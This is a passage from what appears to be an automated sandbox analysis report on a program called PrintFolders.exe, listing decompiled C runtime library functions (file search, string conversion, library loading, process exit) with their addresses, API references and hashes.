														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E00423B6F( &(_v608.cFileName),  &_v640,  &_v609, E00423B18(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E0041E2B8(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E0041E2B8(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E004165E0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00423B57);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E0041E2B8(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E0040EBBF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E0041E2B8(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E0042B0D0(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E0041E2B8( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E0041E2B8(_t283);
						goto L31;
					}
				} else {
					_t219 = E004135F1(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E00413517();
					L31:
					return _t297;
				}
				L81:
			}

0x00423c43
0x00423c46
0x00423c49
0x00423c4a
0x00423c4c
0x00423c62
0x00423c66
0x00423c69
0x00423c6b
0x00423c6d
0x00423c6f
0x00423c71
0x00423c74
0x00423c77
0x00423c7a
0x00423c7c
0x00423cdf
0x00423ce1
0x00423ce4
0x00423ce6
0x00423cea
0x00423cf3
0x00423cf4
0x00423cf7
0x00423cf9
0x00423cfc
0x00423d00
0x00423d00
0x00423d02
0x00423d04
0x00423d06
0x00423d08
0x00423d08
0x00423d0a
0x00423d0d
0x00423d10
0x00423d10
0x00423d12
0x00423d13
0x00423d13
0x00423d1e
0x00423d20
0x00423d23
0x00423d24
0x00423d27
0x00423d27
0x00423d2b
0x00423d2e
0x00423d31
0x00423d31
0x00423d31
0x00423d3e
0x00423d40
0x00423d43
0x00423d45
0x00423d5d
0x00423d60
0x00423d63
0x00423d65
0x00423d68
0x00423d6a
0x00423d6d
0x00423d70
0x00423dcd
0x00423dd0
0x00423dd3
0x00423dd5
0x00000000
0x00423d72
0x00423d74
0x00423d74
0x00423d76
0x00423d79
0x00423d79
0x00423d7b
0x00423d7d
0x00423d83
0x00423d86
0x00423d86
0x00423d88
0x00423d89
0x00423d89
0x00423d90
0x00423d93
0x00423d97
0x00423da4
0x00423da9
0x00423dac
0x00423dae
0x00423e22
0x00423e23
0x00423e24
0x00423e25
0x00423e26
0x00423e27
0x00423e2c
0x00423e30
0x00423e32
0x00423e33
0x00423e36
0x00423e36
0x00423e39
0x00423e39
0x00423e3b
0x00423e3c
0x00423e3c
0x00423e40
0x00423e41
0x00423e48
0x00423e4b
0x00423e4e
0x00423e50
0x00423e58
0x00423e59
0x00423e5a
0x00423e5d
0x00423e67
0x00423e6b
0x00423e6d
0x00423e81
0x00423e81
0x00423e84
0x00423e8e
0x00423e93
0x00423e96
0x00423e98
0x00000000
0x00423e9a
0x00423e9a
0x00423e9f
0x00423ea6
0x00423ea9
0x00423eab
0x00423ebc
0x00423ebe
0x00423ec0
0x00423ec0
0x00423ec0
0x00423ead
0x00423eae
0x00423eb3
0x00423eb6
0x00423ec5
0x00423ecb
0x00000000
0x00423ece
0x00423e6f
0x00423e6f
0x00423e75
0x00423e7a
0x00423e7d
0x00423e7f
0x00423ed1
0x00423ed3
0x00423ed4
0x00423ed5
0x00423ed6
0x00423ed7
0x00423ed8
0x00423edd
0x00423ee0
0x00423ee1
0x00423ee3
0x00423ee9
0x00423ef0
0x00423ef3
0x00423ef6
0x00423ef9
0x00423efa
0x00423efb
0x00423efe
0x00423f04
0x00423f06
0x00423f08
0x00423f08
0x00423f0a
0x00423f0c
0x00000000
0x00000000
0x00423f0e
0x00423f10
0x00423f12
0x00423f14
0x00423f1f
0x00423f21
0x00423f23
0x00000000
0x00000000
0x00423f23
0x00423f14
0x00000000
0x00423f10
0x00423f25
0x00423f25
0x00423f2b
0x00423f2d
0x00423f33
0x00423f35
0x00423f57
0x00423f57
0x00423f59
0x00423f5b
0x00423f67
0x00423f67
0x00423f5d
0x00423f5d
0x00423f5f
0x00000000
0x00423f61
0x00423f61
0x00423f63
0x00423f65
0x00000000
0x00000000
0x00423f65
0x00423f5f
0x00423f6f
0x00423f77
0x00423f7d
0x00423f7e
0x00423f80
0x00423f88
0x00423f8e
0x00423f94
0x00423f9a
0x00423fae
0x00423fb3
0x00423fbe
0x00423fce
0x00423fd4
0x00423fd6
0x00423fd9
0x00423ffc
0x00423ffc
0x00424001
0x00424007
0x00424007
0x0042400d
0x00424013
0x00424019
0x0042401f
0x00424025
0x00424046
0x0042404b
0x00424050
0x00424054
0x0042405a
0x0042405d
0x00424070
0x00424070
0x00424076
0x0042407c
0x0042407d
0x0042407e
0x00424083
0x00424086
0x0042408c
0x0042408e
0x004240ec
0x004240f2
0x004240fa
0x004240ff
0x00424105
0x00424106
0x00000000
0x00000000
0x00000000
0x0042405f
0x0042405f
0x00424062
0x00424064
0x00000000
0x00424066
0x00424066
0x00424069
0x00000000
0x0042406b
0x0042406b
0x0042406e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042406e
0x00424069
0x00424064
0x00424108
0x00424109
0x00000000
0x00424090
0x00424090
0x00424096
0x0042409e
0x004240a3
0x004240b2
0x004240b2
0x004240ba
0x004240c0
0x004240c6
0x004240cd
0x004240d0
0x004240d2
0x004240e2
0x004240e7
0x00000000
0x00423fdb
0x00423fdb
0x00423fe1
0x00423fe2
0x00423fe3
0x00423fe4
0x00423fec
0x00423fec
0x0042410f
0x0042410f
0x00424116
0x00424117
0x0042411f
0x00424124
0x00424125
0x00423f37
0x00423f37
0x00423f3a
0x00423f3c
0x00423f51
0x00000000
0x00423f3e
0x00423f3e
0x00423f41
0x00423f42
0x00423f43
0x00423f44
0x00423f49
0x00423f3c
0x0042412a
0x0042412b
0x0042412d
0x00424134
0x00000000
0x00000000
0x00000000
0x00423e7f
0x00423e52
0x00423e54
0x00423e55
0x00423e57
0x00423e57
0x00000000
0x00000000
0x00000000
0x00000000
0x00423db0
0x00423db0
0x00423db6
0x00423db9
0x00423dbc
0x00423dbf
0x00423dc2
0x00423dc5
0x00423dc8
0x00423dc8
0x00000000
0x00423d79
0x00423d47
0x00423d47
0x00423d4a
0x00423dd7
0x00423dd8
0x00423ddd
0x00000000
0x00423ddd
0x00423c7e
0x00423c7e
0x00423c81
0x00423c89
0x00423c8c
0x00423c93
0x00423c95
0x00423c97
0x00423cb2
0x00423cb3
0x00423cb4
0x00423cb5
0x00423cba
0x00423cbd
0x00423cc0
0x00423c99
0x00423c99
0x00423c9c
0x00423c9d
0x00423c9e
0x00423c9f
0x00423ca0
0x00423ca5
0x00423ca7
0x00423caa
0x00423caa
0x00423cc2
0x00423cc4
0x00000000
0x00000000
0x00423ccd
0x00423cd0
0x00423cd3
0x00423cd5
0x00423cd7
0x00000000
0x00423cd9
0x00423cd9
0x00423cdc
0x00000000
0x00423cdc
0x00000000
0x00423cd7
0x00423d52
0x00423dde
0x00423de1
0x00423de5
0x00423dee
0x00423df1
0x00423df5
0x00423df5
0x00423df7
0x00423dfa
0x00423dfc
0x00423dfe
0x00423e00
0x00423e05
0x00423e06
0x00423e0a
0x00423e0a
0x00423e0e
0x00423e11
0x00423e11
0x00423e15
0x00000000
0x00423e1c
0x00423c4e
0x00423c4e
0x00423c55
0x00423c56
0x00423c58
0x00423e1d
0x00423e21
0x00423e21
0x00000000

APIs

_strpbrk.LIBCMT ref: 00423C8C
_free.LIBCMT ref: 00423DD8

Strings

*?, xrefs: 00423C81

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
Instruction ID: a5b53929445bb92843a6d04ab522df775d1d9dfa49c27ddf940b2185fd00e526
Opcode Fuzzy Hash: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
Instruction Fuzzy Hash: D9616E76E002299FCB14CFA9D8815EEFBF5EF48714F6441AAE815F7300D639AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 10009A2A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009A2A(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E1000A4B8(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E1000A4B8(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E100063D0(GetLastError());
									_t17 =  *((intOrPtr*)(E10006406(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E10009AF1(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E100063D0(GetLastError());
						_t17 =  *((intOrPtr*)(E10006406(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E10009AF1(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E10009B18(_a8);
				return 0;
			}

0x10009a30
0x10009a35
0x10009a49
0x10009a4c
0x10009a7e
0x10009a86
0x10009a88
0x10009aa1
0x10009aa4
0x10009aa7
0x10009ab5
0x10009ac4
0x10009acc
0x10009ace
0x10009ae7
0x10009aea
0x10009aea
0x10009ad0
0x10009ad7
0x10009ae2
0x10009ae2
0x10009aec
0x10009aed
0x00000000
0x10009aed
0x10009aac
0x10009ab1
0x10009ab3
0x00000000
0x00000000
0x00000000
0x10009ab3
0x10009a91
0x10009a9c
0x00000000
0x10009a9c
0x10009a4e
0x10009a51
0x10009a54
0x10009a67
0x10009a6a
0x10009a6c
0x10009a6e
0x00000000
0x10009a6e
0x10009a5a
0x10009a5f
0x10009a61
0x00000000
0x00000000
0x00000000
0x10009a61
0x10009a3a
0x00000000

Strings

C:\Program Files (x86)\PrintFolders\PrintFolders.exe, xrefs: 10009A2F

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\PrintFolders\PrintFolders.exe
API String ID: 0-2080567260
Opcode ID: e9296d43ca75f7937d2bfdf5c651374163314c5b883c374609abe0d00f2d06f1
Instruction ID: f719ca89bfa5e63d0542726edbeff2ced601996c164ddfce3f4ce27f4cb91101
Opcode Fuzzy Hash: e9296d43ca75f7937d2bfdf5c651374163314c5b883c374609abe0d00f2d06f1
Instruction Fuzzy Hash: 1A21F07170421AAFFB10DF619C80D1B77ADEF062E4B218624F924D7198EB70EC0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 10005952 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10005952(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x10017d58 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x10010bf0 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E10007808(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x10005959
0x100059cd
0x1000595e
0x10005960
0x10005967
0x1000596b
0x10005974
0x10005983
0x1000598c
0x10005990
0x100059d9
0x100059db
0x100059df
0x100059e2
0x100059e2
0x100059e8
0x100059e8
0x100059d4
0x100059d8
0x100059d8
0x10005992
0x1000599b
0x100059c5
0x100059c8
0x100059ca
0x100059ca
0x00000000
0x100059ca
0x1000599d
0x100059a8
0x100059ad
0x100059b2
0x00000000
0x00000000
0x100059b9
0x100059bf
0x100059c3
0x00000000
0x00000000
0x00000000
0x100059c3
0x10005970
0x00000000
0x00000000
0x00000000
0x10005972
0x100059d2
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,10005A13,00000000,?,00000001,00000000,?,10005A8A,00000001,FlsFree,10010CAC,FlsFree,00000000), ref: 100059E2

Strings

api-ms-, xrefs: 100059A2

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 05dae4829f89c238065b3f81865d8903e6a2693040ccf54503ed27d823b8eae0
Instruction ID: d85896a24450fc99b6d677e93262eca8bfdbf032966a5c4c6ca1d277b34163f7
Opcode Fuzzy Hash: 05dae4829f89c238065b3f81865d8903e6a2693040ccf54503ed27d823b8eae0
Instruction Fuzzy Hash: 88115431A41625E7FB12CB588C45B4A37E4EF057F1F224251F954AB188D7B1ED0086D5

Uniqueness

Uniqueness Score: -1.00%

Function 00412F77 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00412F77(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x4505f0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x42fb4c + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E004162B4(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00412f7e
0x00412ff2
0x00412f83
0x00412f85
0x00412f8c
0x00412f90
0x00412f99
0x00412fa8
0x00412fb1
0x00412fb5
0x00412ffe
0x00413000
0x00413004
0x00413007
0x00413007
0x0041300d
0x0041300d
0x00412ff9
0x00412ffd
0x00412ffd
0x00412fb7
0x00412fc0
0x00412fea
0x00412fed
0x00412fef
0x00412fef
0x00000000
0x00412fef
0x00412fc2
0x00412fcd
0x00412fd2
0x00412fd7
0x00000000
0x00000000
0x00412fde
0x00412fe4
0x00412fe8
0x00000000
0x00000000
0x00000000
0x00412fe8
0x00412f95
0x00000000
0x00000000
0x00000000
0x00412f97
0x00412ff7
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00413038,?,?,00450598,00000000,?,00413163,00000004,InitializeCriticalSectionEx,0042FC40,InitializeCriticalSectionEx,00000000), ref: 00413007

Strings

api-ms-, xrefs: 00412FC7

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
Instruction ID: 324e9a28238f0b2d2c387c29989b4e23a6be0dab15a3266a9455cfbf25704082
Opcode Fuzzy Hash: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
Instruction Fuzzy Hash: 3911A332B41221ABDB325B689D44B9E77B4AF01760F550232F901E7380D7B8ED92A6DD

Uniqueness

Uniqueness Score: -1.00%

Function 10006D66 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E10006D66(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x10010164(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x10006d6c
0x10006d70
0x10006d7b
0x10006d83
0x10006d8e
0x10006d94
0x10006d98
0x10006d9f
0x10006da5
0x10006da5
0x10006da7
0x10006dac
0x00000000
0x10006db1
0x10006db8

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10006D18,10007C68,?,10006CE0,10002482,?,10007C68), ref: 10006D7B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10006D8E
FreeLibrary.KERNEL32(00000000,?,?,10006D18,10007C68,?,10006CE0,10002482,?,10007C68), ref: 10006DB1

Strings

mscoree.dll, xrefs: 10006D74
CorExitProcess, xrefs: 10006D86

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: db8878897a761d3f804d4e4fac8edfdfd5bd9024b52660bc89352341890e853e
Instruction ID: d2a57dd25697f495839985113eab26af44f550b47abe90b3ea9ba5ee1bafc218
Opcode Fuzzy Hash: db8878897a761d3f804d4e4fac8edfdfd5bd9024b52660bc89352341890e853e
Instruction Fuzzy Hash: B3F0A730B01228FBFB02DB90CD09BDD7ABAEF08396F104064F881A2164CBB4CE00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00417BF1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00417BF1(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x42e234(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00417bf7
0x00417bfb
0x00417c06
0x00417c0e
0x00417c19
0x00417c1f
0x00417c23
0x00417c2a
0x00417c30
0x00417c30
0x00417c32
0x00417c37
0x00000000
0x00417c3c
0x00417c43

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00417BE6,0041CC1F,?,00417BAE,00000000,?,0041CC1F), ref: 00417C06
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00417C19
FreeLibrary.KERNEL32(00000000,?,?,00417BE6,0041CC1F,?,00417BAE,00000000,?,0041CC1F), ref: 00417C3C

Strings

CorExitProcess, xrefs: 00417C11
mscoree.dll, xrefs: 00417BFF

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
Instruction ID: 50fc213c28fa4c0962e30c3ca3a17305303cd13cd11f285dc03a73bb53cf4c5d
Opcode Fuzzy Hash: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
Instruction Fuzzy Hash: E6F08C30644219FBDB219B51DE0ABDEBB79EF00752F5040A1E401A22A0DBB88E02DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 1000B48F Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E1000B48F(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x10017004; // 0x79eab102
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E1000D4D1(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E1000D4D1(_t59, _t85);
						L6:
						_t62 = _a32;
